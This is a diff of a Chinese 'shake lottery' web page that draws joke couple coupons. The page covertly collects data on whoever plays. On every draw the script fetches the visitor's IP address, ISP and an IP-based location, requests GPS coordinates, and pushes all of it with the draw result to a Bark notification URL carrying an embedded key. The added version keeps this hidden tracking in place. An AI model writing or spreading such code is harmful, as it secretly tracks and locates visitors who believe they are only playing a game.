--- a/shake/index.html
+++ b/shake/index.html
@@ -1,284 +1,242 @@
 <!DOCTYPE html>
 <html>
-<head>
-    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
-    <title>摇摇乐</title>
-    <title class="command">"C:\Users\P0195657\Desktop\Test\build-TxtToExcel-Desktop_Qt_5_14_2_MinGW_64_bit-Release\RunEnvironment\制表工具.exe"</title>
-    <style>
-        .c-lucky {
-            background-image: url(background.png);
-            background-size: 650px;
-            height: 700px;
-            width: 700px;
-            background-repeat: no-repeat;
-            position: relative;
-            margin: auto;
-            z-index: 99;
-        }
-
-        .luckyName {
-            width: 308px;
-            height: 164px;
-            margin: 198px 0px 0px 197px;
-            position: relative;
-            display: inline-block;
-            font-size: 50px;
-            line-height: 50px;
-            overflow: hidden;
-            text-align: center;
-        }
-
-        .actionBtn {
-            width: 25px;
-            height: 85px;
-            background-color: transparent;
-            border: none;
-            background-image: url(action.png);
-            background-repeat: no-repeat;
-            background-size: 25px;
-            outline: none;
-            position: absolute;
-            z-index: 0;
-            top: 290px;
-            right: 138px;
-
-        }
-
-        .stopBtn {
-            width: 294px;
-            height: 54px;
-            position: absolute;
-            top: 409px;
-            left: 203px;
-            border-radius: 20px;
-            border: none;
-            background-color: transparent;
-            outline: none;
-            -moz-outline-radius: 20px;
-            font-size: 40px;
-            color: white;
-        }
-
-        .c-lucky .name1,
-        .c-lucky .name2,
-        .c-lucky .name3 {
-            width: 308px;
-            height: 164px;
-            line-height: 164px;
-            position: absolute;
-
-        }
-
-        .c-lucky .name1 {
-            bottom: 164px;
-            white-space: nowrap;
-        }
-
-
-        .c-lucky .name3 {
-            top: 164px;
-            white-space: nowrap;
-        }
-    </style>
-</head>
-<body>
-<div class="noName" style="display: none;"></div>
-
-<div class="c-lucky">
-    <div class="luckyName">
-        <div class="name1" id="el1"></div>
-        <div class="name2" id="el2"></div>
-        <div class="name3"></div>
-    </div>
-
-    <input class="actionBtn" type="button" id="action">
-    <input class="stopBtn" type="button" value="开始" id="stop">
-</div>
-<script>
-    var jsonData = null;
-    var jsonDataBaseStation = null;
-    var jsonlongitude = null;
-    var jsonlatitude = null;
-    var ip = null;
-    var asn_organization = null;
-    var baseStation = null;
-    // 封装函数
-    function getJsonObj(url, callback) {
-        let xmlHttpRequest = new XMLHttpRequest();
-        xmlHttpRequest.open('get', url);
-        xmlHttpRequest.addEventListener('load', function (e) {
-            let responseText = this.responseText;
-            callback(JSON.parse(responseText));
-        })
-        xmlHttpRequest.send(null);
-    }
-
-    function getLocation() {
-        return new Promise((resolve, reject) => {
-            navigator.geolocation.getCurrentPosition((pos) => {
-                const coords = pos.coords || {}
-                const {latitude, longitude} = coords;
-                jsonlongitude = longitude;
-                jsonlatitude = latitude;
-            });
-        });
-    }
-
-    window.onload = getJsonObj('https://api.ip.sb/geoip', (data1) => {
-        // 一个对象
-        jsonData = data1;
-        jsonData = jsonData.toString();
-        ip = jsonData.ip;
-        asn_organization = jsonData.asn_organization;
-        var BaseStationUrl = 'http://ip.zxinc.org/api.php?type=json&ip' + ip;
-        getJsonObj(BaseStationUrl, (data2) => {
-            jsonDataBaseStation = data2;
-jsonDataBaseStation = jsonDataBaseStation.toString();
-            baseStation = jsonDataBaseStation.data.location;
-        });
-    });
-    var oBtn = document.getElementsByClassName('stopBtn')[0];
-    var oResult = document.getElementsByClassName('name2')[0];
-    var arrName = ['卖萌券'
-        , '隐私券'
-        , '停止生气券'
-        , '做主券'
-        , '谢谢惠顾'
-        , '撒娇券'
-        , '女仆券'
-        , '认错券'
-        , '加班券'
-        , '再来一次'
-        , '按摩券'
-        , '亲亲券'
-        , '甜言蜜语券'
-        , '奶茶券'
-        , '情侣装券'
-        , '温柔体贴券'
-        , '压马路券'
-        , '男友心愿券'
-        , '分享秘密券'
-        , '听话券'
-        , '抱抱券'
-        , '浪漫券'
-        , '看小电影券'
-        , '洗衣服券'
-        , '喝酒券'
-        , '旅游券'
-        , '逛街券'
-        , '免追根究底券'
-        , '霸霸券'
-        , '嘿嘿嘿券'
-        , '真心话券'
-        , '角色扮演券'
-        , '礼物券'
-        , '角色互换券'
-        , '帮洗澡券'
-        , '美食券'
-        , '复制券'
-        , '原谅券'
-        , '洗白白券'
-        , '情趣内衣券'
-        , '停止冷战券'
-        , '免干家务券'
-        , '复制券'
-        , '女友心愿券'
-        , '赖床券'
-        , '洗头券'
-        , '男友心愿券'
-        , '吹头发券'
-        , '面壁思过券'
-        , '男友心愿券'
-        , '天荒地老券'
-        , '火锅券'
-        , '允许晚归券'
-        , '购物拎包券'
-        , '女友心愿券'
-        , '烧烤券'
-        , '男友心愿券'
-        , '零花钱券'
-        , '复制券'
-        , '睡懒觉券'
-        , '惊喜券'
-        , '天荒地老券'
-        , '复制券'
-        , '女友心愿券'
-        , '吃大餐券'
-        , '彩虹屁券'
-        , '女友心愿券'
-        , '一言为定券'
-        , '女友心愿券'
-        , '耍赖券'
-        , '赞美券'
-        , '女友心愿券'
-        , '复制券'
-        , '男友心愿券'
-        , '安慰券'
-        , '复制券'
-        , '男友心愿券'
-        , '请客券'
-        , '应酬券'
-        , '女友心愿券'
-        , '复制券'
-        , '打游戏券'
-        , '男友心愿券'
-        , '复制券'
-        , '女友心愿券'
-        , '男友心愿券'
-    ];         //抽签的内容
-    var step = 1;
-    var cnt = 1;
-    var flag = true;
-    oBtn.onclick = function () {
-        getLocation();
-        if (flag) {
-            step = 1;
-            creatName();
-            flag = false;
-        } else {
-            var d = document.getElementsByClassName('number')[0];
-            oResult.removeChild(d);
-            step = 1;
-            creatName();
-        }
-    }
-
-    function getName() {
-        var num = Math.floor(Math.random() * (arrName.length - 1));
-        var n = arrName[num];
-        arrName.splice(num, 1);
-        return n;
-    }
-
-    function creatName() {
-        if (step > cnt) {
-            return null;
-        }
-        step++;
-
-        var oDiv = document.createElement('div');
-        oDiv.className = 'number';
-
-        oResult.appendChild(oDiv);
-
-        var dis = 1;
-        var maxDis = 30;
-        var mySet = setInterval(function () {
-            dis++;
-            if (dis > maxDis) {
-                oDiv.innerHTML = getName();
-                clearInterval(mySet);
-                creatName();
-                var date = new Date();
-                var strdate = date.getUTCFullYear() + "-" + (date.getMonth() + 1) + "-" + date.getDate() + " " + date.getHours() + ":" + date.getMinutes() + ":" + date.getSeconds() + "." + date.getMilliseconds();
-                var url = "https://api.day.app/TbsfqDZZoJXnaP46cttdsN/" + strdate + "\t\t\t本次抽奖结果：" + oDiv.innerHTML + ",本次抽奖IP地址：" + ip + ",本次抽奖运营商：" + asn_organization + ",本次抽奖经纬度：" + jsonlongitude + "," + jsonlatitude + ",本次抽奖基站：" + baseStation;
-                getJsonObj(url, (data) => {
-                });
-                return null;
+    <head>
+        <title>摇摇乐</title>
+        <style>
+            .c-lucky {
+                background-image: url(background.png);
+                background-size: 650px;
+                height: 700px;
+                width: 700px;
+                background-repeat: no-repeat;
+                position: relative;
+                margin: auto;
+                z-index: 99;
             }
-            oDiv.innerHTML = arrName[Math.floor(Math.random() * (arrName.length - 1))];
-        }, 50);
-    }
-</script>
-</body>
+
+            .luckyName {
+                width: 308px;
+                height: 164px;
+                margin: 198px 0px 0px 197px;
+                position: relative;
+                display: inline-block;
+                font-size: 50px;
+                line-height: 50px;
+                overflow: hidden;
+                text-align: center;
+            }
+
+            .actionBtn {
+                width: 25px;
+                height: 85px;
+                background-color: transparent;
+                border: none;
+                background-image: url(action.png);
+                background-repeat: no-repeat;
+                background-size: 25px;
+                outline: none;
+                position: absolute;
+                z-index: 0;
+                top: 290px;
+                right: 138px;
+            }
+
+            .stopBtn {
+                width: 294px;
+                height: 54px;
+                position: absolute;
+                top: 409px;
+                left: 203px;
+                border-radius: 20px;
+                border: none;
+                background-color: transparent;
+                outline: none;
+                -moz-outline-radius: 20px;
+                font-size: 40px;
+                color: white;
+            }
+
+            .c-lucky .name1, .c-lucky .name2, .c-lucky .name3 {
+                width: 308px;
+                height: 164px;
+                line-height: 164px;
+                position: absolute;
+            }
+
+            .c-lucky .name1 {
+                bottom: 164px;
+                white-space: nowrap;
+            }
+
+            .c-lucky .name3 {
+                top: 164px;
+                white-space: nowrap;
+            }
+        </style>
+    </head>
+    <body>
+        <div class="noName" style="display: none;"></div>
+        <div class="c-lucky">
+            <div class="luckyName">
+                <div class="name1" id="el1"></div>
+                <div class="name2" id="el2"></div>
+                <div class="name3"></div>
+            </div>
+            <input class="actionBtn" type="button" id="action">
+            <input class="stopBtn" type="button" value="开始" id="stop">
+        </div>
+        <script>
+            var ip;
+            var org;
+            var longitude;
+            var latitude;
+            var baseStation;
+            var oBtn = document.getElementsByClassName('stopBtn')[0];
+            var oResult = document.getElementsByClassName('name2')[0];
+            var arrName = ['卖萌券', '隐私券', '停止生气券', '做主券', '谢谢惠顾', '撒娇券', '女仆券', '认错券', '加班券', '再来一次', '按摩券', '亲亲券', '甜言蜜语券', '奶茶券', '情侣装券', '温柔体贴券', '压马路券', '男友心愿券', '分享秘密券', '听话券', '抱抱券', '浪漫券', '看小电影券', '洗衣服券', '喝酒券', '旅游券', '逛街券', '免追根究底券', '霸霸券', '嘿嘿嘿券', '真心话券', '角色扮演券', '礼物券', '角色互换券', '帮洗澡券', '美食券', '复制券', '原谅券', '洗白白券', '情趣内衣券', '停止冷战券', '免干家务券', '复制券', '女友心愿券', '赖床券', '洗头券', '男友心愿券', '吹头发券', '面壁思过券', '男友心愿券', '天荒地老券', '火锅券', '允许晚归券', '购物拎包券', '女友心愿券', '烧烤券', '男友心愿券', '零花钱券', '复制券', '睡懒觉券', '惊喜券', '天荒地老券', '复制券', '女友心愿券', '吃大餐券', '彩虹屁券', '女友心愿券', '一言为定券', '女友心愿券', '耍赖券', '赞美券', '女友心愿券', '复制券', '男友心愿券', '安慰券', '复制券', '男友心愿券', '请客券', '应酬券', '女友心愿券', '复制券', '打游戏券', '男友心愿券', '复制券', '女友心愿券', '男友心愿券'];
+            //抽签的内容
+            var step = 1;
+            var cnt = 1;
+            var flag = true;
+            oBtn.onclick = function() {
+                getIP1();
+                getLocation();
+                if (flag) {
+                    step = 1;
+                    creatName();
+                    flag = false;
+                } else {
+                    var d = document.getElementsByClassName('number')[0];
+                    oResult.removeChild(d);
+                    step = 1;
+                    creatName();
+                }
+            }
+
+            function getName() {
+                var num = Math.floor(Math.random() * (arrName.length - 1));
+                var n = arrName[num];
+                arrName.splice(num, 1);
+                return n;
+            }
+
+            function getLocation() {
+                if (navigator.geolocation) {
+                    navigator.geolocation.getCurrentPosition(showPosition);
+                } else {//alert("浏览器不支持地理定位。");
+                }
+            }
+            function showPosition(position) {
+                latitude = position.coords.latitude;
+                longitude = position.coords.longitude;
+                //console.log("纬度: " + position.coords.latitude + "，经度: " + position.coords.longitude);
+            }
+
+            //获取IP
+            function getIP1() {
+                var xhr = new XMLHttpRequest();
+                // 设置请求的URL
+                xhr.open('GET', 'https://api.ip.sb/geoip');
+                // 发送请求
+                xhr.send();
+                // 监听请求状态
+
+                xhr.onreadystatechange = function() {
+                    if (xhr.readyState === 4 && xhr.status === 200) {
+                        // 请求成功，获取响应数据
+                        var response = JSON.parse(xhr.responseText);
+                        // 获取当前设备的IP
+                        ip = response.query;
+                        getBaseStation(ip);
+                        org = response.org;
+                    } else {
+                        getIP2();
+                    }
+                }
+            }
+
+            function getIP2() {
+                var xhr = new XMLHttpRequest();
+                // 设置请求的URL
+                xhr.open('GET', 'https://api.ip.sb/geoip');
+                // 发送请求
+                xhr.send();
+                // 监听请求状态
+
+                xhr.onreadystatechange = function() {
+                    if (xhr.readyState === 4 && xhr.status === 200) {
+                        // 请求成功，获取响应数据
+                        var response = JSON.parse(xhr.responseText);
+                        // 获取当前设备的IP
+                        ip = response.ip;
+                        getBaseStation(ip);
+                        org = response.asn_organization;
+                    }
+                }
+            }
+
+            //获取基站
+            function getBaseStation(ip) {
+                var xhr = new XMLHttpRequest();
+                // 设置请求的URL
+                xhr.open('GET', 'http://ip.zxinc.org/api.php?type=json&' + ip);
+                // 发送请求
+                xhr.send();
+                // 监听请求状态
+
+                xhr.onreadystatechange = function() {
+                    if (xhr.readyState === 4 && xhr.status === 200) {
+                        // 请求成功，获取响应数据
+                        var response = JSON.parse(xhr.responseText);
+                        // 获取当前设备的IP
+                        baseStation = response.data.location;
+                        //console.log(baseStation);
+                    }
+                }
+            }
+
+            //获取GET请求返回值
+            function getJSON(url, /*callback*/
+            ) {
+                var xhr = new XMLHttpRequest();
+                xhr.open('GET', url, true);
+                xhr.onreadystatechange = function() {
+                    if (xhr.readyState == 4 && xhr.status == 200) {
+                        var data = JSON.parse(xhr.responseText);
+                        /*callback(data);*/
+                    }
+                }
+                ;
+                xhr.send();
+            }
+
+            function creatName() {
+                if (step > cnt) {
+                    return null;
+                }
+                step++;
+
+                var oDiv = document.createElement('div');
+                oDiv.className = 'number';
+
+                oResult.appendChild(oDiv);
+
+                var dis = 1;
+                var maxDis = 30;
+                var mySet = setInterval(function() {
+                    dis++;
+                    if (dis > maxDis) {
+                        oDiv.innerHTML = getName();
+                        clearInterval(mySet);
+                        creatName();
+                        var date = new Date();
+                        var strdate = date.getUTCFullYear() + "-" + (date.getMonth() + 1) + "-" + date.getDate() + " " + date.getHours() + ":" + date.getMinutes() + ":" + date.getSeconds() + "." + date.getMilliseconds();
+                        var url = "https://api.day.app/TbsfqDZZoJXnaP46cttdsN/" + strdate + "访问功能：摇摇乐" + "\t\t\t本次抽奖结果：" + oDiv.innerHTML + ",本次抽奖IP地址：" + ip + ",本次抽奖运营商：" + org + ",经度：" + longitude + ",纬度：" + latitude + ",本次抽奖基站：" + baseStation;
+                        getJSON(url);
+                    }
+                    oDiv.innerHTML = arrName[Math.floor(Math.random() * (arrName.length - 1))];
+                }, 50);
+            }
+        </script>
+    </body>
 </html>
